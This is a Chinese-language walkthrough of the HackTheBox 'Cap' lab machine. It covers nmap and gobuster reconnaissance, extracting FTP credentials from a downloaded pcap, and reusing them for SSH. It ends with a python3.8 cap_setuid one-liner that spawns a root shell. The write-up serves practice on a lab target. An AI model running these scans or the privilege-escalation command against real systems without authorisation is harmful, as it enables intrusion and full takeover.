machine-Cap-easy

信息收集

KALI NAMP扫描目标端口

nmap -T4 -vv -sV 10.10.10.245

machine-Cap-easy

gobuster扫描目录

gobuster dir -u http://10.10.10.245/ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50

需要用到的字典下载:

https://github.com/danielmiessler/SecLists

在 /data 目录中发现了很多文件。在点击并尝试目录中的每个文件后,发现了一个文件/data/0
下载数据包进行分析
machine-Cap-easy

分析pcap文件,可以发现目标登录ftp的账号以及密码
machine-Cap-easy

使用此账号尝试登录ftp以及ssh,发现此账号密码可以登录ssh:
machine-Cap-easy

提权

搜索sudo 权限、SUID二进制文件和可以通过为我们提供root shell来提升权限的功能。
尝试通过capabilities 提权。幸运的是,通过以下命令在目标机器上搜索,有cap_setuid可用(目标上的python3.8二进制文件)。

getcap -r / 2>/dev/null

2>/dev/null 是如果你的命令出错的话,错误报告直接就删除了。不会显示在屏幕上,或者是以邮件的形式发给你了。

machine-Cap-easy

python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

machine-Cap-easy

参考链接

https://nepcodex.com/2021/06/cap-walkthrough-hackthebox-writeup/
https://infosecwriteups.com/cap-htb-writeup-hackthebox-882bb62bd60b
https://gtfobins.github.io/gtfobins/python/#capabilities

上一篇:关于表数据的复制插入T-SQL


下一篇:教你一招彻底卸载 MySQL